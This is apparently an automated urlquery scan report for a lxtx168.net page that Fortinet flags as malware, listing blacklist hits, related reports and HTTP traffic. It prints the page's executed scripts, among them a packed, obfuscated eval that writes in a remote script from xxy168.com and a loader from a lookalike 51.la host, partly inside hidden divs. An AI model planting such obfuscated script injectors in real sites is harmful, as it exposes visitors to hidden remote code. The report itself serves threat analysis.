Overview

URL lxtx168.net/yibeipingtai/11.html
IP172.252.155.55
ASNAS18779 EGIHosting
Location United States
Report completed2018-12-13 13:16:46 CET
StatusLoading report..
urlquery Alerts No alerts detected


Settings

UserAgentMozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Referer
Pool
Access Level


Intrusion Detection Systems

Suricata /w Emerging Threats Pro  No alerts detected


Blacklists

MDL  No alerts detected
OpenPhish  No alerts detected
PhishTank  No alerts detected
Fortinet's Web Filter
Added / Verified Severity Host Comment
2018-12-13 2 lxtx168.net/yibeipingtai/11.html Malware
2018-12-13 2 www.lxtx168.net/html5.js Malware
2018-12-13 2 www.lxtx168.net/yibeipingtai/11.html Malware
DNS-BH  No alerts detected
mnemonic secure dns  No alerts detected


Recent reports on same IP/ASN/Domain

Last 10 reports on IP: 172.252.155.55

Date UQ / IDS / BL URL IP
2019-02-11 15:56:01 +0100
0 - 0 - 11 lxtx168.net/yibeipingtaidenglu/2.html 172.252.155.55
2018-10-12 22:48:02 +0200
0 - 4 - 10 lxtx168.net/yibeipingtai 172.252.155.55
2018-10-12 16:00:24 +0200
0 - 4 - 8 www.lxtx168.net/tags.html 172.252.155.55
2018-10-12 06:34:56 +0200
0 - 4 - 8 www.lxtx168.net/yibeipingtai/ 172.252.155.55
2018-10-09 12:06:56 +0200
0 - 0 - 10 lxtx168.net/yibeipingtai 172.252.155.55
2018-10-08 22:59:54 +0200
0 - 4 - 8 www.lxtx168.net/yibeipingtaidenglu/2.html 172.252.155.55
2018-10-04 12:12:47 +0200
0 - 0 - 8 www.lxtx168.net/tag/dahuajiaren_8_1.html 172.252.155.55
2018-10-04 12:12:46 +0200
0 - 0 - 8 www.lxtx168.net/tag/dafu_1_1.html 172.252.155.55
2018-07-04 07:27:08 +0200
0 - 1 - 8 www.lxtx168.net/yibeipingtai/13.html 172.252.155.55
2018-07-01 23:47:11 +0200
0 - 4 - 9 lxtx168.net/tag/chenxin__4_1.html 172.252.155.55

Last 10 reports on ASN: AS18779 EGIHosting

Date UQ / IDS / BL URL IP
2019-04-24 12:48:30 +0200
0 - 0 - 2 0g1e2pqa.com/pjx 45.38.159.204
2019-04-24 12:34:57 +0200
0 - 0 - 2 7uoi.cn/kaifa 107.186.21.133
2019-04-24 12:27:40 +0200
0 - 0 - 2 p9b58.cn/sitemap.html 107.164.61.54
2019-04-24 12:27:19 +0200
0 - 0 - 1 qinzimy.com/art-type-id-6-pg-5.html 172.252.45.100
2019-04-24 12:24:27 +0200
0 - 0 - 1 www.hgyynk.com/bzh.php 172.252.13.119
2019-04-24 12:22:59 +0200
0 - 0 - 2 adhantage.com/rll 107.164.74.182
2019-04-24 12:10:59 +0200
0 - 0 - 2 ifjl94.cn/xrf 107.164.61.84
2019-04-24 12:10:18 +0200
0 - 0 - 3 www.iphone86.com/default.php 142.111.197.240
2019-04-24 12:07:02 +0200
0 - 0 - 1 www.china-gfrc.com/bzh.php 107.186.69.54
2019-04-24 11:54:22 +0200
0 - 0 - 1 tchihe.com/fzn 23.230.130.78

Last 10 reports on domain: lxtx168.net

Date UQ / IDS / BL URL IP
2019-02-11 15:56:01 +0100
0 - 0 - 11 lxtx168.net/yibeipingtaidenglu/2.html 172.252.155.55
2018-10-12 22:48:02 +0200
0 - 4 - 10 lxtx168.net/yibeipingtai 172.252.155.55
2018-10-12 16:00:24 +0200
0 - 4 - 8 www.lxtx168.net/tags.html 172.252.155.55
2018-10-12 06:34:56 +0200
0 - 4 - 8 www.lxtx168.net/yibeipingtai/ 172.252.155.55
2018-10-09 12:06:56 +0200
0 - 0 - 10 lxtx168.net/yibeipingtai 172.252.155.55
2018-10-08 22:59:54 +0200
0 - 4 - 8 www.lxtx168.net/yibeipingtaidenglu/2.html 172.252.155.55
2018-10-04 12:12:47 +0200
0 - 0 - 8 www.lxtx168.net/tag/dahuajiaren_8_1.html 172.252.155.55
2018-10-04 12:12:46 +0200
0 - 0 - 8 www.lxtx168.net/tag/dafu_1_1.html 172.252.155.55
2018-07-04 07:27:08 +0200
0 - 1 - 8 www.lxtx168.net/yibeipingtai/13.html 172.252.155.55
2018-07-01 23:47:11 +0200
0 - 4 - 9 lxtx168.net/tag/chenxin__4_1.html 172.252.155.55


JavaScript

Executed Scripts (1)


Executed Evals (3)

#1 JavaScript::Eval (size: 83, repeated: 1) - SHA256: 63f8bcafeba184770e1ded793351187514a1fdb796cf4a96cbd98e3446ea7815

                                        document.write("<script src=http://js.users.51.la.51la.me/19191831.php></script>");
                                    

#2 JavaScript::Eval (size: 572, repeated: 1) - SHA256: 693f66c4fe4834703d0f7b98eb18d542c88c1d4a62122ccd63de283c43a65477

                                        eval(function(p, a, c, k, e, r) {
    e = function(c) {
        return c.toString(a)
    };
    if (!''.replace(/^/, String)) {
        while (c--) r[e(c)] = k[c] || e(c);
        k = [function(e) {
            return r[e]
        }];
        e = function() {
            return '\\w+'
        };
        c = 1
    };
    while (c--)
        if (k[c]) p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c]);
    return p
}('3 4=["<i j=\'k://l.n.7/m/8.9\' a=\'b\' q=\'d/e\'></f","g>","h"];3 5=[4[0],4[1],4[2]];3 6=[5[0],5[1],5[2]];3 o=p;c[6[2]](6[0]+6[1])', 27, 27, '|||var|_0x4c74|_0x9e1d|_0x2644|com|danyue|js|language|JavaScript|document|text|javascript|sc|ript|write|script|src|https|www||xxy168|site_ture|false|type'.split('|'), 0, {}))
                                    

#3 JavaScript::Eval (size: 288, repeated: 1) - SHA256: fad05e4659a075e0f1fee34938678f281992b3fce769d038e57b0070dedd753a

                                        var _0x4c74 = ["<script src='https://www.xxy168.com/m/danyue.js' language='JavaScript' type='text/javascript'></sc", "ript>", "write"];
var _0x9e1d = [_0x4c74[0], _0x4c74[1], _0x4c74[2]];
var _0x2644 = [_0x9e1d[0], _0x9e1d[1], _0x9e1d[2]];
var site_ture = false;
document[_0x2644[2]](_0x2644[0] + _0x2644[1])
                                    

Executed Writes (4)

#1 JavaScript::Write (size: 136, repeated: 1) - SHA256: 6725b84bf9b28b04fbe4d11d6e9fa226a76f671dffff9b483c124668c602dceb

                                        < div style = "display:none" > < script src = "https://js.users.51.la/18819112.js"
language = "JavaScript"
type = "text/javascript" > < /script></div >
                                    

#2 JavaScript::Write (size: 136, repeated: 1) - SHA256: 3f254a2d748338d58132242b51c2b7156c1a4889a9050da7edac818f5604ddc5

                                        < div style = "display:none" > < script src = "https://js.users.51.la/18992991.js"
language = "JavaScript"
type = "text/javascript" > < /script></div >
                                    

#3 JavaScript::Write (size: 103, repeated: 1) - SHA256: b01c73323f09e30db75a90b17cc05e421d8e2723843854648a013fed4ec7bcaf

                                        < script src = 'https://www.xxy168.com/m/danyue.js'
language = 'JavaScript'
type = 'text/javascript' > < /script>
                                    

#4 JavaScript::Write (size: 64, repeated: 1) - SHA256: 59647fc49760336c6586274ab19aa1a99698975f88fa8983232ce9d5116bb8ac

                                        < script src = http: //js.users.51.la.51la.me/19191831.php></script>
                                    


HTTP Transactions (7)


Request Response
                                        
                                            GET /yibeipingtai/11.html HTTP/1.1 
Host: lxtx168.net
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

                                         
                                         172.252.155.55
HTTP/1.1 301 Moved Permanently
Content-Type: text/html
                                        
Server: nginx
Date: Thu, 13 Dec 2018 11:54:07 GMT
Content-Length: 178
Connection: keep-alive
Location: http://www.lxtx168.net/yibeipingtai/11.html


--- Additional Info ---
Magic:  HTML document text
Size:   178
Md5:    cd2e0e43980a00fb6a2742d3afd803b8
Sha1:   81ffbd1712afe8cdf138b570c0fc9934742c33c1
Sha256: bd9df047d51943acc4bc6cf55d88edb5b6785a53337ee2a0f74dd521aedde87d

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            GET /html5.js HTTP/1.1 
Host: www.lxtx168.net
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.lxtx168.net/yibeipingtai/11.html

                                         
                                         172.252.155.55
HTTP/1.1 200 OK
Content-Type: application/x-javascript
                                        
Server: nginx
Date: Thu, 13 Dec 2018 11:54:08 GMT
Last-Modified: Sat, 04 Nov 2017 02:47:51 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Expires: Thu, 13 Dec 2018 12:54:08 GMT
Cache-Control: max-age=3600
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   825
Md5:    b3bde07c723ae5a45febdba234cdc922
Sha1:   f79be8236145dd3f96efe9f82dacf61cc629f889
Sha256: 8f7e5e5320e2b117dffb35fdc2c060f5ea9f68e9186ce0fa35136a66b0c05b60

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            GET /templets/default/css/main.css HTTP/1.1 
Host: www.lxtx168.net
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.lxtx168.net/yibeipingtai/11.html

                                         
                                         172.252.155.55
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Server: nginx
Date: Thu, 13 Dec 2018 11:54:08 GMT
Last-Modified: Tue, 31 Jan 2017 05:04:53 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Expires: Thu, 13 Dec 2018 12:54:08 GMT
Cache-Control: max-age=3600
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   12706
Md5:    46439db374f2f9e018cd89a39a4eb09d
Sha1:   ec1ca5401da0d5b1761539714075902ec2922375
Sha256: 17b528c77635e13fb723e56fa227bcfb78ae58cd8350513fe17cbe72ffd9e4ff
                                        
                                            GET /yibeipingtai/11.html HTTP/1.1 
Host: www.lxtx168.net
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

                                         
                                         172.252.155.55
HTTP/1.1 200 OK
Content-Type: text/html
                                        
Server: nginx
Date: Thu, 13 Dec 2018 11:54:08 GMT
Last-Modified: Tue, 31 Jan 2017 06:45:18 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   70183
Md5:    e4569aeeddde1f9ec9a630d8f937c674
Sha1:   97f932bfebdece513dd6cc6c9c5b87c07d02e908
Sha256: 13272460dd6e32c5fb1e5848e51ac6765a12bde3749015663e80bc986071e877

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            GET /19191831.php HTTP/1.1 
Host: js.users.51.la.51la.me
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.lxtx168.net/yibeipingtai/11.html

                                         
                                         118.184.51.145
HTTP/1.1 301 Moved Permanently
Content-Type: text/html
                                        
Server: nginx
Date: Thu, 13 Dec 2018 12:15:19 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Location: http://www.51.la


--- Additional Info ---
Magic:  UTF-8 Unicode text, with no line terminators
Size:   3
Md5:    ecaa88f7fa0bf610a5a26cf545dcd3aa
Sha1:   57218c316b6921e2cd61027a2387edc31a2d9471
Sha256: f1945cd6c19e56b3c1c78943ef5ec18116907a4ca1efc40a57d48ab1db7adfc5
                                        
                                            GET / HTTP/1.1 
Host: www.51.la
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.lxtx168.net/yibeipingtai/11.html

                                         
                                         0.0.0.0
                                        


--- Additional Info ---
                                        
                                            GET / HTTP/1.1 
Host: www.51.la
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.lxtx168.net/yibeipingtai/11.html

                                         
                                         183.131.207.78
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
                                        
Server: HuaweiCloudWAF
Date: Thu, 13 Dec 2018 12:16:04 GMT
Content-Length: 161
Connection: keep-alive
Set-Cookie: HWWAFSESID=d66401188ff8b2a7f75; path=/ HWWAFSESTIME=1544703360916; path=/
Location: https://www.51.la


--- Additional Info ---
Magic:  HTML document text
Size:   161
Md5:    a9eec393cdcff2fc0822a1c0588ca25b
Sha1:   dd0d3588192dac2bfd7c847685a73af82dc9e5fc
Sha256: 0286536f8370884ea15084bf2347e81b4dfeddcc894cf6e81263e77728bc192c